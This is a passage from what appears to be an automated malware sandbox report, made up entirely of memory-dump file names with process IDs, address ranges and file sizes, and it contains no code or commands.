                                                                                                                                                                                                                                                                                        • memory/3416-403-0x0000000000C80000-0x0000000000C82000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                        • memory/3416-374-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/3472-168-0x0000000000390000-0x0000000000391000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/3472-225-0x000000001B130000-0x000000001B132000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                        • memory/3472-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/3472-209-0x0000000000AD0000-0x0000000000AEC000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          112KB

                                                                                                                                                                                                                                                                                        • memory/3476-463-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/3632-346-0x0000000000400000-0x0000000002D0E000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          41.1MB

                                                                                                                                                                                                                                                                                        • memory/3632-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/3632-344-0x0000000002F80000-0x000000000301D000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          628KB

                                                                                                                                                                                                                                                                                        • memory/4080-190-0x0000000000C70000-0x0000000000C71000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4080-236-0x0000000005420000-0x0000000005A26000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          6.0MB

                                                                                                                                                                                                                                                                                        • memory/4080-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4252-457-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4312-470-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4356-633-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4372-479-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4408-322-0x0000000000400000-0x00000000023BC000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          31.7MB

                                                                                                                                                                                                                                                                                        • memory/4408-305-0x00000000001C0000-0x00000000001EF000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          188KB

                                                                                                                                                                                                                                                                                        • memory/4408-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4432-484-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4436-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4436-355-0x0000000004A20000-0x0000000004A21000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4436-350-0x0000000000400000-0x0000000002CD0000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          40.8MB

                                                                                                                                                                                                                                                                                        • memory/4436-367-0x0000000004A24000-0x0000000004A26000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                        • memory/4436-345-0x0000000002CD0000-0x0000000002E1A000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                                                                                                        • memory/4436-360-0x0000000004A23000-0x0000000004A24000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4436-358-0x0000000004A22000-0x0000000004A23000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4460-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4472-425-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4548-486-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4604-249-0x0000000077580000-0x000000007770E000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                                                                                                        • memory/4604-174-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4604-315-0x0000000005720000-0x0000000005721000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4604-263-0x00000000012D0000-0x00000000012D1000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4656-117-0x0000000003920000-0x0000000003A5F000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                        • memory/4672-260-0x000000000041905A-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4672-319-0x0000000005880000-0x0000000005D7E000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          5.0MB

                                                                                                                                                                                                                                                                                        • memory/4672-254-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                                                                                        • memory/4680-473-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4684-493-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4688-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4724-460-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4724-465-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          80KB

                                                                                                                                                                                                                                                                                        • memory/4904-407-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4924-472-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          80KB

                                                                                                                                                                                                                                                                                        • memory/4924-466-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4940-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/4956-461-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/5012-370-0x00000188F77A0000-0x00000188F780F000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          444KB

                                                                                                                                                                                                                                                                                        • memory/5012-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/5012-372-0x00000188F7810000-0x00000188F78DF000-memory.dmp
                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          828KB

                                                                                                                                                                                                                                                                                        • memory/5336-583-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/5352-582-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/5576-587-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/5652-590-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/5776-581-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                        • memory/5944-630-0x0000000000000000-mapping.dmp